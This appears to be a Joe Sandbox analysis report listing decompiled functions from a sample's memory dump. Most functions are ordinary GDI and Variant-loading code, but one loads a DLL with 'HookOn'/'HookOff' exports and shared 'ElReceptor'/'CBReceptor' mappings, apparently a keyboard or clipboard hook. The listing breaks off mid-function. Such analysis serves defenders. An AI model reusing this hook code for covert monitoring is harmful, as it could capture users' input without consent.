                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                    • API String ID: 667068680-597814768
                                                    • Opcode ID: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                    • Opcode Fuzzy Hash: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040F7D0 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040F7D0() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x49e7a4 = E0040F7A4("VariantChangeTypeEx", E0040F340, _t91);
				 *0x49e7a8 = E0040F7A4("VarNeg", E0040F370, _t91);
				 *0x49e7ac = E0040F7A4("VarNot", E0040F370, _t91);
				 *0x49e7b0 = E0040F7A4("VarAdd", E0040F37C, _t91);
				 *0x49e7b4 = E0040F7A4("VarSub", E0040F37C, _t91);
				 *0x49e7b8 = E0040F7A4("VarMul", E0040F37C, _t91);
				 *0x49e7bc = E0040F7A4("VarDiv", E0040F37C, _t91);
				 *0x49e7c0 = E0040F7A4("VarIdiv", E0040F37C, _t91);
				 *0x49e7c4 = E0040F7A4("VarMod", E0040F37C, _t91);
				 *0x49e7c8 = E0040F7A4("VarAnd", E0040F37C, _t91);
				 *0x49e7cc = E0040F7A4("VarOr", E0040F37C, _t91);
				 *0x49e7d0 = E0040F7A4("VarXor", E0040F37C, _t91);
				 *0x49e7d4 = E0040F7A4("VarCmp", E0040F388, _t91);
				 *0x49e7d8 = E0040F7A4("VarI4FromStr", E0040F394, _t91);
				 *0x49e7dc = E0040F7A4("VarR4FromStr", E0040F400, _t91);
				 *0x49e7e0 = E0040F7A4("VarR8FromStr", E0040F46C, _t91);
				 *0x49e7e4 = E0040F7A4("VarDateFromStr", E0040F4D8, _t91);
				 *0x49e7e8 = E0040F7A4("VarCyFromStr", E0040F544, _t91);
				 *0x49e7ec = E0040F7A4("VarBoolFromStr", E0040F5B0, _t91);
				 *0x49e7f0 = E0040F7A4("VarBstrFromCy", E0040F630, _t91);
				 *0x49e7f4 = E0040F7A4("VarBstrFromDate", E0040F6A0, _t91);
				_t46 = E0040F7A4("VarBstrFromBool", E0040F710, _t91);
				 *0x49e7f8 = _t46;
				return _t46;
			}






                                                    0x0040f7de
                                                    0x0040f7f2
                                                    0x0040f808
                                                    0x0040f81e
                                                    0x0040f834
                                                    0x0040f84a
                                                    0x0040f860
                                                    0x0040f876
                                                    0x0040f88c
                                                    0x0040f8a2
                                                    0x0040f8b8
                                                    0x0040f8ce
                                                    0x0040f8e4
                                                    0x0040f8fa
                                                    0x0040f910
                                                    0x0040f926
                                                    0x0040f93c
                                                    0x0040f952
                                                    0x0040f968
                                                    0x0040f97e
                                                    0x0040f994
                                                    0x0040f9aa
                                                    0x0040f9ba
                                                    0x0040f9c0
                                                    0x0040f9c7

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F7D9
                                                      • Part of subcall function 0040F7A4: GetProcAddress.KERNEL32(00000000), ref: 0040F7BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                    • API String ID: 1646373207-1918263038
                                                    • Opcode ID: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                    • Instruction ID: 068c6e066db7a12a78cda71ceaebb25bc6294a0e525a49770a7ca0196cea08b9
                                                    • Opcode Fuzzy Hash: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                    • Instruction Fuzzy Hash: 84411E656042049AD334EBAF794142A73C8D7D4724364C07FB804EBEE5DB7DA8498A2F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426204 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x49de34; // 0x49b0ec
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E00426060(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x426484);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E00426060(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x49e894; // 0x5e0807a3
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x49e894; // 0x5e0807a3
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x42648b);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E00426060(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x4262d7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, L00407A44(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0x42648b);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}























                                                    0x00426205
                                                    0x00426207
                                                    0x0042620d
                                                    0x00426210
                                                    0x00426213
                                                    0x00426215
                                                    0x00426218
                                                    0x0042621b
                                                    0x0042621f
                                                    0x00426227
                                                    0x004262e0
                                                    0x004262ef
                                                    0x004262f4
                                                    0x004262f5
                                                    0x004262fa
                                                    0x004262fd
                                                    0x00426310
                                                    0x00426320
                                                    0x00426325
                                                    0x00426334
                                                    0x00426341
                                                    0x0042634a
                                                    0x00426362
                                                    0x00426371
                                                    0x0042634c
                                                    0x0042635b
                                                    0x0042635b
                                                    0x00426378
                                                    0x0042639a
                                                    0x004263bc
                                                    0x004263c9
                                                    0x004263d7
                                                    0x004263fe
                                                    0x00426423
                                                    0x0042642d
                                                    0x00426437
                                                    0x00426440
                                                    0x0042644a
                                                    0x0042644a
                                                    0x00426453
                                                    0x0042645a
                                                    0x0042645d
                                                    0x00426460
                                                    0x00426469
                                                    0x00426475
                                                    0x00426475
                                                    0x00426483
                                                    0x0042623f
                                                    0x00426251
                                                    0x00426261
                                                    0x00426266
                                                    0x00426267
                                                    0x0042626c
                                                    0x0042626f
                                                    0x004262ab
                                                    0x004262b2
                                                    0x004262b5
                                                    0x004262b8
                                                    0x004262ca
                                                    0x004262d6
                                                    0x004262d6

                                                    APIs
                                                    • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00426247
                                                    • SelectObject.GDI32(?,?), ref: 0042625C
                                                    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                    • SelectObject.GDI32(?,?), ref: 004262C5
                                                    • DeleteObject.GDI32(?), ref: 004262D1
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 004262E5
                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00426306
                                                    • SelectObject.GDI32(?,?), ref: 0042631B
                                                    • SelectPalette.GDI32(?,5E0807A3,00000000), ref: 0042632F
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 00426341
                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 00426356
                                                    • SelectPalette.GDI32(?,5E0807A3,000000FF), ref: 0042636C
                                                    • RealizePalette.GDI32(?), ref: 00426378
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                    • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                    • SetTextColor.GDI32(?,?), ref: 0042642D
                                                    • SetBkColor.GDI32(?,?), ref: 00426437
                                                    • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                    • DeleteObject.GDI32(?), ref: 00426453
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 00426475
                                                    • DeleteDC.GDI32(?), ref: 0042647E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                    • String ID:
                                                    • API String ID: 3976802218-0
                                                    • Opcode ID: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                    • Opcode Fuzzy Hash: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00429708 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00429708(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00428BFC(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x429903);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E00426060(GetDC(0));
					_v20 = E00426060(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L17:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x42990a);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E00426060(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x4298bb);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E00429040(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x4298c2);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

























                                                    0x00429709
                                                    0x0042970b
                                                    0x00429711
                                                    0x00429713
                                                    0x00429715
                                                    0x00429719
                                                    0x0042971e
                                                    0x00429913
                                                    0x00429738
                                                    0x0042973a
                                                    0x00429741
                                                    0x00429746
                                                    0x0042974b
                                                    0x0042974c
                                                    0x00429751
                                                    0x00429754
                                                    0x00429763
                                                    0x00429774
                                                    0x0042978a
                                                    0x00429791
                                                    0x004298d5
                                                    0x004298d5
                                                    0x004298d7
                                                    0x004298da
                                                    0x004298dd
                                                    0x004298e6
                                                    0x004298ec
                                                    0x004298ec
                                                    0x004298f5
                                                    0x00000000
                                                    0x004298fd
                                                    0x00429902
                                                    0x00429797
                                                    0x004297a4
                                                    0x004297ad
                                                    0x004297d9
                                                    0x004297de
                                                    0x004297df
                                                    0x004297e4
                                                    0x004297e7
                                                    0x004297ee
                                                    0x0042980e
                                                    0x004297f0
                                                    0x004297f0
                                                    0x004297f6
                                                    0x0042980a
                                                    0x0042980a
                                                    0x0042981c
                                                    0x00429821
                                                    0x0042982a
                                                    0x00429833
                                                    0x0042983f
                                                    0x00429848
                                                    0x00429848
                                                    0x00429852
                                                    0x00429876
                                                    0x00429880
                                                    0x00429889
                                                    0x00429893
                                                    0x00429893
                                                    0x0042989c
                                                    0x0042989f
                                                    0x0042989f
                                                    0x004298a6
                                                    0x004298a9
                                                    0x004298ac
                                                    0x004298ba
                                                    0x004297af
                                                    0x004297c1
                                                    0x004298c6
                                                    0x004298d0
                                                    0x004298d0
                                                    0x00000000
                                                    0x004298c6
                                                    0x004297ad
                                                    0x00429791

                                                    APIs
                                                    • GetObjectA.GDI32(?,00000054,?), ref: 0042972B
                                                    • GetDC.USER32(00000000), ref: 00429759
                                                    • CreateCompatibleDC.GDI32(?), ref: 0042976A
                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00429785
                                                    • SelectObject.GDI32(?,00000000), ref: 0042979F
                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 004297C1
                                                    • CreateCompatibleDC.GDI32(?), ref: 004297CF
                                                    • SelectObject.GDI32(?), ref: 00429817
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0042982A
                                                    • RealizePalette.GDI32(?), ref: 00429833
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0042983F
                                                    • RealizePalette.GDI32(?), ref: 00429848
                                                    • SetBkColor.GDI32(?), ref: 00429852
                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00429876
                                                    • SetBkColor.GDI32(?,00000000), ref: 00429880
                                                    • SelectObject.GDI32(?,00000000), ref: 00429893
                                                    • DeleteObject.GDI32 ref: 0042989F
                                                    • DeleteDC.GDI32(?), ref: 004298B5
                                                    • SelectObject.GDI32(?,00000000), ref: 004298D0
                                                    • DeleteDC.GDI32(00000000), ref: 004298EC
                                                    • ReleaseDC.USER32 ref: 004298FD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                    • String ID:
                                                    • API String ID: 332224125-0
                                                    • Opcode ID: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                    • Instruction ID: d4ef2d2dc6560d6c5cd56807feb3c438281ae7d61b0b2818eaec840712012d23
                                                    • Opcode Fuzzy Hash: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                    • Instruction Fuzzy Hash: 95516071F04218BBDB10EBE9DC45FAFB7FCAB09704F54446AB614F7281C678A9408B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004764E4 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 144filelibraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				struct HINSTANCE__* _t30;
				intOrPtr _t46;
				intOrPtr _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				void _t97;
				void* _t99;
				intOrPtr _t102;

				_push(0);
				_t97 = __ecx;
				_t74 = __edx;
				_t99 = __eax;
				_push(_t102);
				_push(0x476697);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				if(__edx == 0) {
					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
						 *((intOrPtr*)(__eax + 0x48))();
					}
					_t30 =  *(_t99 + 0x40);
					if(_t30 != 0) {
						FreeLibrary(_t30);
					}
					if( *(_t99 + 0x30) != 0) {
						UnmapViewOfFile( *(_t99 + 0x38));
						UnmapViewOfFile( *(_t99 + 0x3c));
						CloseHandle( *(_t99 + 0x30));
						CloseHandle( *(_t99 + 0x34));
					}
				} else {
					_t82 =  *0x49ec58; // 0x0
					E0047671C(__edx, _t82, __edx, __ecx, __eax);
					_t46 =  *0x49ec5c; // 0x0
					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
					if( *(_t99 + 0x40) == 0) {
						_t86 =  *0x49ec58; // 0x0
						E00404CCC( &_v8, _t86, 0x4766ac);
						E0047671C(_t74, _v8, _t74, _t97, _t99);
						_t70 =  *0x49ec5c; // 0x0
						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
					}
					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
						E0040D144(0x4766c8, 1);
						E00404378();
					}
					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
					 *(_t99 + 0x30) = _t75;
					if(_t75 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
					 *(_t99 + 0x38) = _t76;
					 *_t76 = _t97;
					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
					 *(_t99 + 0x34) = _t77;
					if(_t77 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
					 *(_t99 + 0x3c) = _t78;
					 *_t78 = _t97;
					 *((intOrPtr*)(_t99 + 0x44))();
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(0x47669e);
				return E004049C0( &_v8);
			}


















                                                    0x004764e7
                                                    0x004764ec
                                                    0x004764ee
                                                    0x004764f0
                                                    0x004764f4
                                                    0x004764f5
                                                    0x004764fa
                                                    0x004764fd
                                                    0x00476502
                                                    0x00476645
                                                    0x00476647
                                                    0x00476647
                                                    0x0047664a
                                                    0x0047664f
                                                    0x00476652
                                                    0x00476652
                                                    0x0047665b
                                                    0x00476661
                                                    0x0047666a
                                                    0x00476673
                                                    0x0047667c
                                                    0x0047667c
                                                    0x00476508
                                                    0x00476508
                                                    0x00476512
                                                    0x00476517
                                                    0x00476527
                                                    0x0047652e
                                                    0x00476533
                                                    0x0047653e
                                                    0x0047654a
                                                    0x0047654f
                                                    0x0047655f
                                                    0x0047655f
                                                    0x00476570
                                                    0x00476581
                                                    0x00476588
                                                    0x0047659c
                                                    0x004765a1
                                                    0x004765a1
                                                    0x004765ba
                                                    0x004765bc
                                                    0x004765c1
                                                    0x004765cf
                                                    0x004765d4
                                                    0x004765d4
                                                    0x004765ea
                                                    0x004765ec
                                                    0x004765ef
                                                    0x00476605
                                                    0x00476607
                                                    0x0047660c
                                                    0x0047661a
                                                    0x0047661f
                                                    0x0047661f
                                                    0x00476635
                                                    0x00476637
                                                    0x0047663a
                                                    0x0047663c
                                                    0x0047663c
                                                    0x00476683
                                                    0x00476686
                                                    0x00476689
                                                    0x00476696

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000), ref: 00476522
                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00476697), ref: 0047655A
                                                    • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                    • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                    • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,HookOn), ref: 004765E5
                                                    • CreateFileMappingA.KERNEL32 ref: 00476600
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476652
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476661
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 0047666A
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476673
                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047667C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                    • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                    • API String ID: 2408097603-676361416
                                                    • Opcode ID: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                    • Opcode Fuzzy Hash: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A510 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040275C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0x42aa2d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x42aa00);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = L00403BBC(1);
						if(_a4 == 0) {
							E004032B4( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						L0041D93C(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t261 = _v64;
					E004032B4(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					L00425F40();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							L0041D8CC(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E004261D0( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
